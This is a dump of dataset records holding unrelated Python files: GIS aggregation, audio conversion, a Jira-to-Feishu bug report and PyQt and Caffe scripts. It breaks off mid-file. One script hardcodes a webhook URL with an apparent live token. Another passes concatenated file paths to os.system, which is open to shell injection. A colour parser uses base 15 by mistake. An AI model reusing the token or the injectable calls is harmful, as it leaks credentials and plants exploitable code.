rudder_position\n self.engine_state = (engine_speed, engine_direction)\n\n self.__datum = datum\n \n def set_rudder(self, rudder):\n self.rudder_position = rudder","sub_path":"navigation_block/1_python_in_the_auv_challenge/3_object_oriented_programming/building_your_auv_step_2/BWSI_AUV.py","file_name":"BWSI_AUV.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"276106861","text":"import pandas as pd\nimport geopandas as gpd\nimport maup\n\n#load in precinct and district shapefiles\ncensus_blocks = gpd.read_file('/Users/hopecj/projects/AR/Shapefiles/oachita/GeoStor/Society.BLOCKS_TIGER_2010_polygon.shp')\nprecincts = gpd.read_file('/Users/hopecj/projects/AR/Shapefiles/oachita/ouachita_parnership 17/partnership_shapefiles_17v2_05103/PVS_17_v2_vtd_05103.shp')\n\n#make sure they are in the same CRS\nprecincts = precincts.to_crs(census_blocks.crs)\n\n#make district assignment for every precinct\nassignment = maup.assign(census_blocks, precincts)\ncensus_blocks['assignment'] = assignment\n\n# save file\nprecincts.to_file('/Users/hopecj/projects/AR/Shapefiles/oachita/censusblocks_assigned.shp')\n\n####\n## # if you want to aggregate \n####\n\n#list variables you want to aggreage into precincts\nvariables = ['tot','hispanic']\n\n#sum votes by district\nprecincts[variables] = census_blocks[variables].groupby(assignment).sum()\n\n#check that totals match\nprec_total = census_blocks['tot'].sum()\nprint('old tot',prec_total)\nagg_total = precincts['tot'].sum()\nprint('new tot',agg_total)\n\n#save file\nprecincts.to_file('filename.shp')\n\ncsv = precincts.drop(['geometry'],axis = 1)\ncsv.to_csv('filename.csv')\n","sub_path":"General/MaupAssign_Aggregate.py","file_name":"MaupAssign_Aggregate.py","file_ext":"py","file_size_in_byte":1204,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"263131422","text":"import argparse\nimport pathlib\nimport os\nimport soundfile\n\n\ndef command():\n\tparser = argparse.ArgumentParser(description=\"help\")\n\tparser.add_argument('mode', choices=[\"wave\", \"spleeter\", \"conv_name\", \"short\"], help=\"select a mode\")\n\tparser.add_argument('--input', help=\"input music directory\")\n\tparser.add_argument('--output', help=\"output directory\")\n\t\n\targs = parser.parse_args()\n\treturn args\n\ndef main(args):\n\n\tif args.mode == \"wave\":\n\t\twave(args)\n\telif args.mode == \"spleeter\":\n\t\tspleeter(args)\n\telif args.mode == \"conv_name\":\n\t\tconv_name(args)\n\telif args.mode == \"short\":\n\t\tshort(args)\n\ndef wave(args):\n\t\"\"\"\n\tconvert files to wave\n\n\t:param args: The arguments\n\t:type args: { type_description }\n\t\"\"\"\n\tfiles = pathlib.Path(args.input)\n\ti = 1\n\tfor file in files.iterdir():\n\t\tparent = str(file.parent)\n\t\tfilename = pathlib.PurePosixPath(file).stem\n\t\toutput_name = \"music\"+str(i).zfill(4)\n\t\tos.system(\"ffmpeg -i \"+str(pathlib.PurePath(parent,file.name))+\" -ar 24000 \"+str(pathlib.PurePath(parent,output_name))+\".wav\")\n\t\ti+=1\n\ndef spleeter(args):\n\t\"\"\"\n\trun spleeter\n\n\t:param args: The arguments\n\t:type args: { type_description }\n\t\"\"\"\n\tfiles = pathlib.Path(args.input)\n\ti = 1\n\tfor file in files.iterdir():\n\t\tparent = str(file.parent)\n\t\tfilename = pathlib.PurePosixPath(file).stem\n\t\tif args.output is not None:\n\t\t\toutput_name = str(args.output)\n\t\telse:\n\t\t\toutput_name = \"music\"+str(i).zfill(4)\n\t\n\t\tprint(\"spleeter separate -i \"+str(pathlib.PurePath(parent,file.name))+\" -o \"+output_name+\" -p spleeter:5stems\")\n\t\tos.system(\"spleeter separate -i \"+str(pathlib.PurePath(parent,file.name))+\" -o \"+output_name+\" -p spleeter:5stems\")\n\t\ti+=1\n\ndef conv_name(args):\n\t\"\"\"\n\trename extracted vocal file\n\n\t:param args: The arguments\n\t:type args: { type_description }\n\t\"\"\"\n\tfiles = pathlib.Path(args.input)\n\ti = 1\n\tfor file in files.iterdir():\n\t\tparent = str(pathlib.PurePath(file.parent, \"music\"+str(i).zfill(4)))\n\t\tfilename = pathlib.PurePosixPath(file).stem\n\t\toutput_name = str(pathlib.PurePath(args.output, \"music\"+str(i).zfill(4)+\".wav\"))\n\t\t# print(\"cp \"+str(pathlib.PurePath(parent,\"vocals.wav\"))+\" \"+str(output_name))\n\t\tos.system(\"cp \"+str(pathlib.PurePath(parent,\"vocals.wav\"))+\" \"+str(output_name))\n\t\t# os.system(\"cp \"+str(pathlib.PurePath(parent,file.name))+\" \"+str(output_name))\n\t\ti+=1\n\ndef short(args):\n\t\"\"\"\n\tseparate music into 20 sec\n\n\t:param args: The arguments\n\t:type args: { type_description }\n\t\"\"\"\n\tfiles = pathlib.Path(args.input)\n\ti = 1\n\t# for all files in the directory\n\tfor file in files.iterdir():\n\t\tinput_file = str(file)\n\t\tmusic = soundfile.SoundFile(input_file)\n\t\tlength = int(len(music) / music.samplerate)\n\t\t# separate music into 20 sec\n\t\tfor start in range(0, length, 20):\n\t\t\toutput_file = str(pathlib.PurePath(args.output, file.stem+\"_\"+str(start)+\".wav\"))\n\t\t\tos.system(\"ffmpeg -i \"+input_file+\" -ss \"+str(start)+\" -to \"+str(start+20 if start+20 < length else length)+\" -c copy \"+output_file)\n\t\ti+=1\n\n\n\nif __name__ == '__main__':\n\tmain(command())","sub_path":"music2wav.py","file_name":"music2wav.py","file_ext":"py","file_size_in_byte":3011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"405068592","text":"from onjira import onjira_api\nimport requests\nfrom datetime import date, datetime, timedelta\nimport calendar\n\n\njira_api = onjira_api.JiraApi()\njira = jira_api.login()\n\n#业务线\nproduct_ks = ' (店铺平台 = 快手) ) '\nproduct_jd = '(店铺平台 = 京东))'\n\n#解决部门\nteam_ks = '(解决部门 ~ 快手)'\nteam_jd = '(解决部门 ~ 京东)'\n\n# 3.飞书机器人webhook地址(先建群,再添加机器人,在获取机器人的webhook地址)\nfeishu_url_cxxl = 'https://open.feishu.cn/open-apis/bot/v2/hook/2c593c2f-bf67-4e92-bd64-443feb024ea4'\n\n\ndef jql_deal(forward_day, today_day, product, teams):\n jql_create_bugs = 'project = BUG AND ( ' + product + ' AND created >= ' + str(forward_day) + \\\n ' AND created <= ' + str(today_day) + ' ORDER BY created DESC'\n jql_repair_bugs = 'project = BUG AND ' + teams + ' AND created >= ' + str(forward_day) + \\\n ' AND created <= ' + str(today_day) + ' ORDER BY cf[10468] DESC, resolved DESC, cf[10441] ASC, created DESC'\n print(jql_create_bugs)\n print(jql_repair_bugs)\n return jql_create_bugs, jql_repair_bugs\n\n\ndef create_bugs(f_day, l_day, product, team):\n all_bugs = jira.search_issues(jql_deal(f_day, l_day, product, team)[0],\n fields='', maxResults=1000) # 获取所有bug\n print(all_bugs)\n # return all_bugs\n text = ''\n criti_bugs = ''\n L0 = 0\n L1 = 0\n L2 = 0\n L3 = 0\n result_support_list = {}\n result_onlingbug_list = {}\n for issue in all_bugs:\n assignee = str(issue.fields.assignee) # 经办人\n result_support = str(issue.fields.customfield_10442)\n print(result_support)# 排查结果-技术支持\n if result_support:\n if result_support_list.get(result_support):\n result_support_list[result_support] += 1\n else:\n result_support_list[result_support] = 1\n result_onlingbug = str(issue.fields.customfield_10441) # 排查结果-线上缺陷\n if len(assignee) == 2: # 样式优化\n assignee = assignee[0] + \" \" + assignee[1]\n\n # print(assignee)\n # reporter = str(issue.fields.reporter)\n # if len(reporter) == 2:\n # reporter = reporter[0] + \" \" + reporter[1]\n level = str(issue.fields.customfield_10440) # bug等级\n if level == 'None':\n level = \"L2\"\n status = str(issue.fields.status) # 状态\n summary = issue.fields.summary # bug标题\n if len(summary) > 20:\n summary = summary[:24] + \"...\"\n bug = str(issue) + \" \" + level + \"-\" + str(assignee) + \"-\" + status + \"-\" + summary\n text += bug + \"\\n\"\n creatime = \"创建时间:\" + str(issue.fields.created[:10])\n text = text + creatime + \"\\n\"\n if level == 'L0':\n L0 += 1\n criti_bugs += bug + \"\\n\"\n elif level == 'L1':\n L1 += 1\n criti_bugs += bug + \"\\n\"\n elif level == 'L2':\n L2 += 1\n elif level == 'L3':\n L3 += 1\n else:\n L2 += 1\n return str(len(all_bugs)), text, (L0, L1, L2, L3), criti_bugs, result_support_list\n\n\ndef send_to_feishu_developer(text, feishu_url):\n \"\"\"\n 发送飞书消息\n :param text:\n :param feishu_url:\n :return:\n \"\"\"\n headers = {'Content-Type': 'application/json'}\n data = {\"msg_type\": \"text\", \"content\": {\"text\": text}}\n res = requests.post(feishu_url, json=data, headers=headers)\n if res.status_code == 200:\n return True\n else:\n return False\n\n\n\n\n\nwd = 7\nt_day1 = date.today()\n# print(t_day1)\nf_day1 = (datetime.now() - timedelta(days=wd)).strftime('%Y-%m-%d')\n# print(f_day1)\n\n\na = create_bugs(f_day=f_day1, l_day=t_day1, product=product_jd, team=team_jd)\nprint(a)\n\n\n# send_to_feishu_developer(a[1], feishu_url_cxxl)\n\n\n","sub_path":"onjira/everyweek_bug.py","file_name":"everyweek_bug.py","file_ext":"py","file_size_in_byte":3842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"535920534","text":"from PyQt5 import QtCore, QtGui, QtWidgets\nfrom storage.models import Format\n\n# class Format(QtGui.QTextFormat):\n# def __init__(self):\n# super().__init__()\n#\n# def toQColor(self, hex):\n# r, g, b = hex[1:3], hex[3:5], hex[5:7]\n# return QtGui.QColor(int(r, 16), int(g, 16), int(b, 16))\n\nclass FormatManager:\n LEVEL_FORMAT_COLORS = dict()\n LEVEL_FORMATS = dict() # generate by LEVEL_FORMAT_COLORS\n\n # default values\n LEVEL_FORMAT_COLORS = {\n 1: '#87a840',\n 2: '#ddc328',\n 3: '#b63226',\n 4: '#278da9',\n # 5: '#363d5c',\n None: '#363d5c'\n }\n\n for format in Format.objects.all():\n if format.level == 0: \n LEVEL_FORMAT_COLORS[None] = format.color\n else:\n LEVEL_FORMAT_COLORS[format.level] = format.color\n # print('format.color', format.color)\n # print('format.level', format.level)\n\n POS_FORMAT_COLORS = {\n 1: '#363d5c',\n 2: '#87a840',\n 3: '#ddc328'\n }\n POS_FORMATS = {}\n\n def __init__(self, editor):\n self.editor = editor\n\n for level, color in self.LEVEL_FORMAT_COLORS.items():\n format = QtGui.QTextCharFormat()\n format.setForeground(self.toQColor(color))\n self.LEVEL_FORMATS[level] = format\n\n for level, color in self.POS_FORMAT_COLORS.items():\n format = QtGui.QTextCharFormat()\n format.setForeground(self.toQColor(color))\n self.POS_FORMATS[level] = format\n\n def toQColor(self, hex):\n r, g, b = hex[1:3], hex[3:5], hex[5:7]\n return QtGui.QColor(int(r, 15), int(g, 16), int(b, 16))\n","sub_path":"managers/FormatManager.py","file_name":"FormatManager.py","file_ext":"py","file_size_in_byte":1638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"453572788","text":"#%%\nimport numpy as np\nlearning_rates = 10 ** np.random.uniform(-7, -5, 10)\n#%% create solvers\nconf = []\nconf_names = []\nfor lr in learning_rates:\n conf.append(\n'''net: \"models/model3/train_val.prototxt\"\ntest_iter: 200\ntest_interval: 500\nbase_lr: {0}\nlr_policy: \"step\"\ngamma: 0.1\nstepsize: 6000\ndisplay: 20\nmax_iter: 6000\nmomentum: 0.9\nweight_decay: 0.0005\nsnapshot: 2000\nsnapshot_prefix: \"models/model3/model3_train_{0:.9f}\"\nsolver_mode: GPU'''.format(lr))\n conf_names.append(\"models/model3/solver_{0:.9f}.prototxt\".format(lr))\n\nfor i in range(len(learning_rates)):\n with open(conf_names[i], \"w\") as text_file:\n text_file.write(conf[i])\n\n#%%\n\ncommands = []\n\nfor lr in learning_rates:\n commands.append(\n'''caffe train \\\\\n -gpu 0 \\\\\n -solver models/model3/solver_{0:.9f}.prototxt \\\\\n -weights models/model3/bvlc_reference_caffenet.caffemodel 2>&1 | tee log/model3_{0:.9f}.log'''.format(lr))\n\n#%%\nimport os\nfor cmd in commands:\n os.system(cmd)\n","sub_path":"scripts/train_model3_model_selection.py","file_name":"train_model3_model_selection.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"432849036","text":"# Phone number to words\r\n\r\nphone= input(\"enter phone number: \")\r\nmapping={\r\n \"1\":\"one\",\r\n \"2\":\"two\",\r\n \"3\":\"three\",\r\n \"4\":\"four\",\r\n \"5\":\"five\",\r\n \"6\":\"six\",\r\n \"7\":\"seven\",\r\n \"8\":\"eight\",\r\n \"9\":\"nine\",\r\n \"0\":\"zero\"\r\n}\r\n\r\noutput=\"\"\r\nfor i in phone:\r\n output += mapping.get(i,\"!\") + \" \" # for other values or zero prints exclamation mark\r\nprint(output)\r\n","sub_path":"python_prac/Number to words.py","file_name":"Number to words.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"159744919","text":"from helpers import main_menu, set_donor_name\nfrom db_ops import update_donations, list_donors, add_donor, create_report, send_thankyou, save_report\n\n\ndef thankyou_procedure():\n donor_name = set_donor_name()\n if donor_name.lower() == 'list':\n print(list_donors())\n elif donor_name in list_donors():\n send_thankyou(donor_name)\n else:\n add_donor(donor_name)\n\n\ndef main():\n while True:\n users_choice = main_menu()\n selection = {\n '1': thankyou_procedure,\n '2': create_report,\n '3': save_report,\n '4': sys.exit\n }\n try:\n selection[users_choice]()\n except KeyError:\n print('Choose 1 to 4')\n pass\n","sub_path":"students/ghassan/lesson07/mailroom/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"478169132","text":"from PyQt5.QtWidgets import *\nfrom PyQt5.QtGui import *\n\n\nclass Gui(QWidget):\n def __init__(self):\n super().__init__()\n self.initUi()\n\n def initUi(self):\n valueBeforeLabel = QLabel('Value before')\n valueAfterLabel = QLabel('Value after')\n fromCurrencyLabel = QLabel('From currency')\n toCurrencyLabel = QLabel('To currency')\n self.valueBefore = QLineEdit()\n self.valueAfter = QLineEdit()\n self.fromCurrency = QComboBox()\n self.toCurrency = QComboBox()\n self.convertButton = QPushButton('Convert')\n\n # Validator\n self.valueBefore.setValidator(QIntValidator())\n self.valueAfter.setValidator(QIntValidator())\n self.valueAfter.setReadOnly(True)\n\n # Layout\n grid = QGridLayout()\n grid.setSpacing(10)\n grid.addWidget(valueBeforeLabel, 1, 0)\n grid.addWidget(self.valueBefore, 1, 1)\n grid.addWidget(fromCurrencyLabel, 2, 0)\n grid.addWidget(self.fromCurrency, 2, 1)\n grid.addWidget(toCurrencyLabel, 3, 0)\n grid.addWidget(self.toCurrency, 3, 1)\n grid.addWidget(valueAfterLabel, 4, 0)\n grid.addWidget(self.valueAfter, 4, 1)\n grid.addWidget(self.convertButton, 5, 1)\n self.setLayout(grid)\n\n # Set up\n width, height = (400, 300)\n self.setWindowTitle(\"Currency converter\")\n self.resize(width, height)\n\n # Center\n qtRectangle = self.frameGeometry()\n centerPoint = QDesktopWidget().availableGeometry().center()\n qtRectangle.moveCenter(centerPoint)\n self.move(qtRectangle.topLeft())","sub_path":"Gui.py","file_name":"Gui.py","file_ext":"py","file_size_in_byte":1629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"471908450","text":"from config import Config as cfg\nfrom utils import *\n\nimport tensorflow as tf\nimport gym\nimport numpy as np\n\nenv = gym.make('MountainCar-v0')\npos_bins = 30\nspeed_bins = 30\nobs_dim = pos_bins+speed_bins\nn_acts = env.action_space.n\n\nQ1 = mlp(obs_dim, [200, n_acts], dropout=None, use_bias=False)\nQ2 = mlp(obs_dim, [200, n_acts], dropout=None, use_bias=False)\n\nQ1_opt = tf.optimizers.Adam(learning_rate=cfg.learning_rate)\nQ2_opt = tf.optimizers.Adam(learning_rate=cfg.learning_rate)\n\n# acts = [0,1,1,2,...]\n# logits = [[l1, l2, l3], [l1, l2, l3] ...]\n# acts*logits = [[l1, 0, 0], [0,l2,0], ...] ==> reduce_sum() ==> [l1, l2, ...]\n\ndef train_step(Q1, Q1_opt, Q2, Q2_opt, epsilon):\n '''\n :param Q1: First function approximator for the action value function\n :param Q1_opt: Optimizer for the first function approximator\n :param Q2: Second function approximator for the action value function\n :param Q2_opt: Optimizer for the second function approximator\n :param epsilon: Agent will explore with probability epsilon\n :return: dictionary of summary statistics of the train step\n '''\n\n # Initialization for batch. Batch contains multiple episodes:\n collect_Q1_loss = 0 # loss for Q1 and Q2\n collect_Q2_loss = 0 #\n iteration = 0\n batch_acts = [] # store actions\n batch_rews = [] # store rewards\n batch_obs = [] # store observations\n batch_rets = [] # store episode returns\n batch_lens = [] # store episode lengths\n batch_velocity = [] # store the absolute speed over the train step\n\n # reset episode-specific variables\n obs = env.reset() # first obs comes from starting distribution\n done = False # signal from environment that episode is over\n ep_rews = [] # list for rewards accrued throughout ep\n ep_obs = []\n ep_acts = []\n ep_velocity = []\n\n # generate an episode\n while not done:\n pos_input = discretize(obs[0], np.linspace(env.observation_space.low[0], env.observation_space.high[0] - 0.1,\n pos_bins))\n speed_input = discretize(obs[1], np.linspace(env.observation_space.low[1], env.observation_space.high[1],\n speed_bins))\n input = np.concatenate([pos_input, speed_input])\n ep_obs.append(input.copy())\n\n if np.random.binomial(1, 1 - epsilon):\n # value_input = np.concatenate([np.array([obs] * 3), tf.one_hot([0, 1, 2], 3)], axis=1)\n act = np.argmax(tf.nn.softmax(Q1(input.reshape(1,-1))) + tf.nn.softmax(Q2(input.reshape(1,-1))))\n #act = tf.random.categorical(tf.math.softmax(Q1(obs.reshape(1, -1)) + Q2(obs.reshape(1, -1))), 1).numpy()[0][\n # 0]\n else:\n act = env.action_space.sample()\n\n obs, rew, done, _ = env.step(act)\n\n ep_acts.append(act)\n ep_rews.append(rew)\n ep_velocity.append(np.abs(obs[1]))\n\n if done:\n if obs[0] >= 0.5: print('Final location: {}'.format(obs[0]))\n\n # if episode is over, record info about episode\n ep_ret, ep_len = sum(ep_rews), len(ep_rews)\n batch_rets.append(ep_ret)\n batch_lens.append(ep_len)\n batch_rews.append(ep_rews)\n batch_obs.append(ep_obs)\n batch_acts.append(ep_acts)\n batch_velocity.append(np.mean(ep_velocity))\n iteration += len(ep_obs)\n\n # reset episode-specific variables\n obs, done, = env.reset(), False\n ep_rews, ep_obs, ep_acts, ep_velocity = [], [], [], []\n\n # end experience loop if we have enough of it\n if iteration > cfg.batch_size:\n # print(len(batch_obs))\n break\n\n with tf.GradientTape(persistent = True) as tape:\n for k, ep_obs, ep_rews, ep_acts in zip(range(len(batch_obs)), batch_obs, batch_rews, batch_acts):\n # phi_input = np.concatenate([np.array(ep_obs), tf.one_hot(ep_acts, 3)], axis = 1)\n ep_len = len(ep_obs)\n phi_1 = Q1(np.array(ep_obs), training=True)\n phi_2 = Q2(np.array(ep_obs), training=True)\n\n which_network = np.random.binomial(1, 0.5) # switch which network we are updating\n\n if which_network:\n # targets can be static...\n # the discounted return\n G = n_step_G(ep_rews, cfg.td_steps, cfg.discount_rate)\n # if we have not reached the top by end of episode, append action value estimate, otherwise append 0\n extra = phi_2[-1][np.argmax(phi_1[-1])] if (obs[0] < 0.5) else 0\n\n # if we are not done, then Q is the n-step-ahead action value function output ...\n # ... otherwise it is the value of 'extra'\n Q_ = [phi_2[j + cfg.td_steps][np.argmax(phi_1[j + cfg.td_steps])] if j + cfg.td_steps < ep_len\n else 0\n for j in range(ep_len)]\n Q = [cfg.discount_rate ** cfg.td_steps * q if j + cfg.td_steps < ep_len\n else cfg.discount_rate ** (ep_len - j) * extra\n for j, q in enumerate(Q_)]\n\n # form the full targets\n td_targets = np.array(G) + np.array(Q)\n\n # values must be linked (allow backprop), are they?\n # td_values = tf.reduce_sum(phi_2*tf.one_hot(ep_acts, 3),axis=1)[:-1]\n td_values = [phi_1[j][ep_acts[j]] for j in range(ep_len)]\n value_func_loss = tf.losses.MeanSquaredError()(td_targets, td_values)\n collect_Q1_loss += value_func_loss\n else:\n G = n_step_G(ep_rews, cfg.td_steps, cfg.discount_rate)\n extra = phi_1[-1][np.argmax(phi_2[-1])] if (obs[0] < 0.5) else 0\n\n Q_ = [phi_1[j + cfg.td_steps][np.argmax(phi_2[j + cfg.td_steps])] if j + cfg.td_steps < ep_len\n else 0\n for j in range(ep_len)]\n Q = [cfg.discount_rate ** cfg.td_steps * q if j + cfg.td_steps < ep_len\n else cfg.discount_rate ** (ep_len - j) * extra\n for j, q in enumerate(Q_)]\n\n td_targets = np.array(G) + np.array(Q)\n\n td_values = [phi_2[j][ep_acts[j]] for j in range(ep_len)]\n value_func_loss = tf.losses.MeanSquaredError()(td_targets, td_values)\n collect_Q2_loss += value_func_loss\n\n Q1_grads = tape.gradient(collect_Q1_loss, Q1.trainable_variables)\n Q1_opt.apply_gradients(zip(Q1_grads, Q1.trainable_variables))\n\n Q2_grads = tape.gradient(collect_Q2_loss, Q2.trainable_variables)\n Q2_opt.apply_gradients(zip(Q2_grads, Q2.trainable_variables))\n\n return({'Q1_loss': collect_Q1_loss,\n 'Q2_loss': collect_Q2_loss,\n 'batch_acts':batch_acts,\n 'batch_rets':batch_rets,\n 'batch_lens':batch_lens,\n 'average_velocity':np.mean(batch_velocity)\n })\n\n\nfor i in range(cfg.epochs):\n res = train_step(Q1, Q1_opt, Q2, Q2_opt, epsilon=max(cfg.explore_0*cfg.explore_decay**i, 0.1))\n print('Epoch {}: Q1 loss: {}, Q2 loss: {}, Avg Reward: {}, Avg ep len: {}, Avg speed: {}'.format(\n i, res['Q1_loss'], res['Q2_loss'], np.sum(res['batch_rets'])/len(res['batch_rets']),\n np.sum(res['batch_lens']) / len(res['batch_lens']), res['average_velocity']))\n#\n\n### inspect the performance of the agent:\nimport time\nobs = env.reset() # first obs comes from starting distribution\ndone = False # signal from environment that episode is over\n\nfor i in range(10):\n while not done:\n pos_input = discretize(obs[0], np.linspace(env.observation_space.low[0], env.observation_space.high[0] - 0.1,\n pos_bins))\n speed_input = discretize(obs[1], np.linspace(env.observation_space.low[1], env.observation_space.high[1],\n speed_bins))\n input = np.concatenate([pos_input, speed_input])\n # value_input = np.concatenate([np.array([obs] * 3), tf.one_hot([0, 1, 2], 3)], axis=1)\n act = np.argmax(Q1(input.reshape(1,-1))+Q2(input.reshape(1,-1)))\n # act = tf.random.categorical(tf.math.softmax(Q1(obs.reshape(1, -1)) + Q2(obs.reshape(1, -1))), 1).numpy()[0][0]\n obs, rew, done, _ = env.step(act)\n env.render()\n time.sleep(0.01)\n\n done = False\n obs = env.reset()\n\nenv.close()","sub_path":"q_learning/double_q_td_mountaincar.py","file_name":"double_q_td_mountaincar.py","file_ext":"py","file_size_in_byte":8467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"488262476","text":"# -*- coding: utf-8 -*-\r\n# case 1284\r\nimport os\r\nimport unittest\r\nimport common.util as u\r\nfrom uiautomatorplug.android import device as d\r\nimport time\r\n\r\n\"\"\"\r\nissues:\r\n1. adb always offline\r\n\"\"\"\r\nclass fm_open_close(unittest.TestCase):\r\n def setUp(self):\r\n u.clog()\r\n u.checkScreen()\r\n d.click(1380, 800)\r\n u.setUp()\r\n\r\n def tearDown(self):\r\n u.tearDown()\r\n\r\n # @unittest.skip(\"skip this test\")\r\n def test_open_close(self):\r\n for i in xrange(100):\r\n self._launch_apps()\r\n time.sleep(2)\r\n d(resourceId=\"android:id/mwCloseBtn\").click()\r\n time.sleep(2)\r\n\r\n\r\n def _launch_apps(self):\r\n cmp = \"com.chaozhuo.filemanager/.activities.MainActivity\"\r\n d.start_activity(component=cmp)\r\n","sub_path":"atPhoenix/autoTest/script/testcases/tmp/fm_open_close.py","file_name":"fm_open_close.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"288103923","text":"#advent of code 18\n\nclass Number:\n def __init__ (self,value):\n self.value = value\n\n def __add__ (self,other):\n return Number(self.value + other.value)\n\n def __sub__ (self,other):\n return Number(self.value * other.value)\n\n def __truediv__(self,other):\n return Number(self.value + other.value)\n\n\ndef main():\n part1 = False\n \n myfile = open('input18.txt')\n data = myfile.read()\n myfile.close()\n\n data = data.split('\\n')\n total = 0\n for i in range (len(data)):\n line = data[i].replace(\" \", \"\").replace('*','-')\n if not part1:\n line = line.replace('+','/')\n line = list(line)\n \n \n \n for i in range (len(line)):\n if line[i] not in ['+','-','/','(',')',' ']:\n line[i] = 'Number('+line[i]+')'\n\n \n line = ''.join(line)\n total += eval(line).value\n \n if part1:\n print('Part 1:',total)\n else:\n print('Part 2:',total)\n \n\n\nif __name__ == '__main__':\n main()\n","sub_path":"adventCode18.py","file_name":"adventCode18.py","file_ext":"py","file_size_in_byte":1054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"481124910","text":"import re\n\n# \"log/cups/access_log\" -> \"log/cups/\"\ndef get_path_part(filename):\n try:\n index = filename.rindex('/')\n dir_name = filename[0: index + 1]\n return dir_name\n except:\n return ''\n\n# \"log/cups/access_log\" -> \"access_log\"\ndef get_filename_part(filename):\n try:\n index = filename.rindex('/')\n base_name = filename[index + 1:]\n return base_name\n except:\n return filename\n\n\n\n# \"assets/image.png\" -> \"png\"\ndef get_file_extension(filename):\n try:\n occurrences = [m.start() for m in re.finditer('\\.', filename)]\n return filename[occurrences[-1] + 1:]\n except:\n return ''\n\n\n\nassert(get_path_part(\"log/cups/access_log\") == \"log/cups/\")\nassert(get_path_part(\"log/cups/\") == \"log/cups/\")\nassert(get_path_part(\"cups/access_log\") == \"cups/\")\nassert(get_path_part(\"access_log\") == \"\")\nassert(get_filename_part(\"log/cups/access_log\") == \"access_log\")\nassert(get_filename_part(\"log/cups/\") == \"\")\nassert(get_filename_part(\"cups/access_log\") == \"access_log\")\nassert(get_filename_part(\"access_log\") == \"access_log\")\nassert(get_file_extension(\"log/cups/access_log\") == \"\")\nassert(get_file_extension(\"base/FileHelper.cpp\") == \"cpp\")\nassert(get_file_extension(\"base/FileHelper.cpp.bak\") == \"bak\")","sub_path":"FilePath.py","file_name":"FilePath.py","file_ext":"py","file_size_in_byte":1277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"193271093","text":"# This file is part of VoltDB.\n\n# Copyright (C) 2008-2015 VoltDB Inc.\n#\n# This file contains original code and/or modifications of original code.\n# Any modifications made by VoltDB Inc. are licensed under the following\n# terms and conditions:\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the\n# \"Software\"), to deal in the Software without restriction, including\n# without limitation the rights to use, copy, modify, merge, publish,\n# distribute, sublicense, and/or sell copies of the Software, and to\n# permit persons to whom the Software is furnished to do so, subject to\n# the following conditions:\n#\n# The above copyright notice and this permission notice shall be\n# included in all copies or substantial portions of the Software.\n\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND,\n# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF\n# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.\n# IN NO EVENT SHALL THE AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR\n# OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,\n# ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR\n# OTHER DEALINGS IN THE SOFTWARE.\n\n# Main Java class.\nVoltCompiler = 'org.voltdb.compiler.VoltCompiler'\n\n\n# Command meta-data.\n@VOLT.Command(\n # Descriptions for help screen.\n description='Compile schema and stored procedures to build an application catalog.',\n description2='At least one DDL file is required unless a project file is provided.',\n\n # Command line options.\n options=(\n VOLT.StringOption('-c', '--classpath', 'classpath',\n 'additional colon-separated Java CLASSPATH directories'),\n VOLT.StringOption('-o', '--output', 'catalog',\n 'the output application catalog jar file',\n default='catalog.jar'),\n VOLT.StringOption('-p', '--project', 'project',\n 'the project file, e.g. project.xml (deprecated)')\n ),\n\n # Command line arguments.\n arguments=(\n VOLT.PathArgument('ddl', 'DDL file(s)', exists=True, min_count=0, max_count=None)\n )\n)\n# Command implementation.\ndef compile(runner):\n # Check that there's something to compile.\n if not runner.opts.project and not runner.opts.ddl:\n runner.abort_with_help('Either project or DDL files must be specified.')\n\n # Explicit extensions allow VoltCompiler.main() to discriminate between the\n # new and old style argument lists, i.e. with and without a project file.\n # Checking here enables better error messages.\n if not runner.opts.catalog.lower().endswith('.jar'):\n runner.abort('Output catalog file \"%s\" does not have a \".jar\" extension.'\n % runner.opts.catalog)\n if runner.opts.project and not runner.opts.project.lower().endswith('.xml'):\n runner.abort('Project file \"%s\" does not have a \".xml\" extension.'\n % runner.opts.project)\n\n # Verbose argument display.\n if runner.is_verbose():\n params = ['Output catalog file: %s' % runner.opts.catalog]\n if runner.opts.project:\n params.append('Project file: %s' % runner.opts.project)\n if runner.opts.ddl:\n params.append('DDL files:')\n params.append(runner.opts.ddl)\n runner.verbose_info('Compilation parameters:', params)\n\n # Build the positional and keyword argument lists and invoke the compiler\n args = []\n if runner.opts.project:\n args.append(runner.opts.project)\n args.append(runner.opts.catalog)\n if runner.opts.ddl:\n args.extend(runner.opts.ddl)\n # Add procedures to classpath\n cpath = 'procedures'\n if runner.opts.classpath:\n cpath = 'procedures:' 